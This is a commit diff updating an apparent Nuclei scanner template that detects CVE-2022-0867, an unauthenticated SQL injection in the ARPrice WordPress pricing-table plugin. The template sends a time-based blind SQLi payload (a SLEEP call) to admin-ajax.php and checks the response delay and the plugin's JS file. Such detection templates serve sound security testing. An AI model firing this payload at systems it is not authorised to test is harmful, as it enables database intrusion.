Update CVE-2022-0867.yaml
parent
1ba1362268
commit
55d372fff8
|
@ -11,28 +11,31 @@ info:
|
||||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
||||||
cvss-score: 9.8
|
|
||||||
cve-id: CVE-2022-0867
|
cve-id: CVE-2022-0867
|
||||||
cwe-id: CWE-89
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: "true"
|
verified: true
|
||||||
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,arprice-responsive-pricing-table,unauth
|
tags: cve,cve2022,wordpress,wp-plugin,wp,arprice-responsive-pricing-table,sqli,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 15s
|
@timeout: 10s
|
||||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(5)))iIic)
|
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=5'
|
- 'duration_1>=6'
|
||||||
- 'status_code == 200'
|
- 'status_code_1 == 200'
|
||||||
- 'contains(content_type, "text/html")'
|
- 'contains(content_type_1, "text/html")'
|
||||||
condition: and
|
- 'contains(body_2, "ArpPriceTable")'
|
||||||
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue